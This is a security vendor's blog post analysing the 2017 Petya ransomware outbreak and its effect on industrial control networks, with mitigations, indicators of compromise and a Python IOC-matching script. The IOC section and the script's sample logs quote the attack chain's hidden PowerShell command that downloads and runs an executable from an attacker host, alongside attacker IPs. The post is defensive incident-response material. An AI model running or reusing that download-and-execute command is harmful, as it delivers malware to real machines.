The Claroty Blog

Petya Ransomware Analysis - Impact on ICS Networks

By Patrick McBride

INITIAL ANALYSIS (1:40pm EDT - 6.27.17) - CHECK BACK FOR UPDATES

A very rapidly propagating ransomware campaign is unfolding today. The ransomware, named Petya, has been hitting networks globally, including many in critical infrastructure domains.

The malware is similar to WannaCry but leverages other techniques to propagate and encrypt systems.

Our initial analysis suggests that Petya’s potential impact on ICS networks appears to be more severe than WannaCry due to the following:

  • Impact on ICS Windows machines: Petya does not encrypt files one by one against a list of matching extensions; it encrypts the master file table (MFT) so that the file system is no longer accessible, effectively bricking the machine.

    This means that any infected HMI would be locked immediately. While this would not directly affect the underlying physical process, it would remove all visibility and monitoring capability, which in most, if not all, cases would force a shutdown. The OT network would have to stay in manual mode until the infected Windows endpoints are recovered. Other SCADA components, e.g. historians, backup servers and engineering stations, would be impacted as well.

  • Propagation: Petya’s propagation capabilities surpass those of WannaCry, as it leverages the current user’s privileges to spread through the network (using PsExec). It also uses WMI as a propagation vector.


Permanent mitigation steps are similar to those for WannaCry:

  • Patch the following CVEs:
    • CVE-2017-0199
    • CVE-2017-0144
  • Note that these patches cover only one of the propagation vectors (SMB, CVE-2017-0144) and the RTF/HTA infection vector (CVE-2017-0199).


Additional Protection and Recovery Steps:

  • Block SMB and WMI (TCP ports 135, 139, 445 and 1024-1035), if possible.
    1. NOTE: Some ICS software relies on these services, so this can impact operations.
    2. Customers can use the Claroty Platform to determine whether their current ICS environments are using these ports/protocols.
  • Block execution of .exe files within %AppData% and %Temp% as a temporary measure to avoid infection until other mitigation steps can be taken. This may cause issues (for example, it will break installers), but it provides temporary relief.
  • Check logs for the IOCs below.
  • If infected:
    1. Try to avoid a reboot. Run "shutdown -a" (e.g. cmd /k shutdown -a) to abort the pending shutdown and preserve a copy of the MFT from memory for recovery.
    2. Try not to format the encrypted systems; instead, take an image of them for use in the recovery steps.

Indicators of Compromise (IOC)[1]

File Name:     Order-20062017.doc (actually RTF exploiting CVE-2017-0199)
MD5:           415FE69BF32634CA98FA07633F4118E1
SHA-1:         101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256:       FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size:     6215 bytes
File Type:     Rich Text Format data

Connections:   84.200.16.242 port 80
               h11p://84.200.16.242/myguy.xls (actually an HTA)

File Name:     myguy.xls
MD5:           0487382A4DAF8EB9660F1C67E30F8B25
SHA-1:         736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256:       EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size:     13893 bytes
File Type:     Zip archive data

Process chain (command lines with PIDs):

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
10807.exe %APPDATA%\10807.exe" " (PID: 3096)

File Name:     BCA9D6.exe
MD5:           A1D5895F85751DFE67D19CCCB51B051A
SHA-1:         9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256:       17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size:     275968 bytes

Communicates to: 111.90.139.247 port 80
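As an added example (not Claroty's code or the referenced gist's), here is a Python script that applies the indicators above: it hashes files under a directory against the IOC hash values and flags log lines that mention the listed hosts or match the mshta/PowerShell download pattern from the process chain. The sample log lines are constructed, and the regular expressions are assumptions about how those command lines appear in your own logs.

```python
import hashlib
import re
from pathlib import Path
# Indicators copied verbatim from the IOC table on this page, keyed by hash value.
IOC_HASHES = {
    "415FE69BF32634CA98FA07633F4118E1": "Order-20062017.doc (MD5)",
    "101CC1CB56C407D5B9149F2C3B8523350D23BA84": "Order-20062017.doc (SHA-1)",
    "FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206": "Order-20062017.doc (SHA-256)",
    "0487382A4DAF8EB9660F1C67E30F8B25": "myguy.xls (MD5)",
    "736752744122A0B5EE4B95DDAD634DD225DC0F73": "myguy.xls (SHA-1)",
    "EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6": "myguy.xls (SHA-256)",
    "A1D5895F85751DFE67D19CCCB51B051A": "BCA9D6.exe (MD5)",
    "9288FB8E96D419586FC8C595DD95353D48E8A060": "BCA9D6.exe (SHA-1)",
    "17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD": "BCA9D6.exe (SHA-256)",
}
IOC_HOSTS = {"84.200.16.242", "111.90.139.247", "french-cooking.com"}
# Behaviour from the process chain on this page: mshta running an .hta, and
# PowerShell fetching an .exe into %APPDATA%. Regexes are assumptions about log format.
BEHAVIOUR_PATTERNS = {
    "mshta launching .hta": re.compile(r"mshta\.exe.*\.hta", re.I),
    "powershell DownloadFile to AppData": re.compile(
        r"powershell\.exe.*DownloadFile\(.*(?:%APPDATA%|\\AppData\\).*\.exe", re.I),
}

def digests(data: bytes) -> dict:
    """Return lowercase md5/sha1/sha256 hex digests of a byte string."""
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256")}

def match_hashes(data: bytes) -> set:
    """Labels of IOC table entries whose hash matches the given bytes."""
    return {IOC_HASHES[h.upper()] for h in digests(data).values() if h.upper() in IOC_HASHES}

def scan_dir(root) -> list:
    """Hash every regular file under root and return (path, IOC label) matches."""
    return [(str(p), label) for p in Path(root).rglob("*") if p.is_file()
            for label in match_hashes(p.read_bytes())]

def check_log_line(line: str) -> list:
    """Reasons a process or proxy log line matches the IOCs or behaviour on this page."""
    reasons = [f"contact with IOC host {h}" for h in sorted(IOC_HOSTS) if h in line]
    return reasons + [n for n, rx in BEHAVIOUR_PATTERNS.items() if rx.search(line)]

# Constructed sample lines (not real logs), shaped like the command lines shown above.
SAMPLE_LOG = [
    'mshta.exe "C:\\myguy.xls.hta" (PID: 2324)',
    "powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient)"
    ".DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\\10807.exe')",
    "GET h11p://84.200.16.242/myguy.xls 200",
    "svchost.exe -k netsvcs (PID: 800)",
]
```

Run scan_dir() over the directories named in the mitigation list (%AppData%, %Temp%) and feed exported process or proxy logs line by line into check_log_line().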

 

[1] https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759
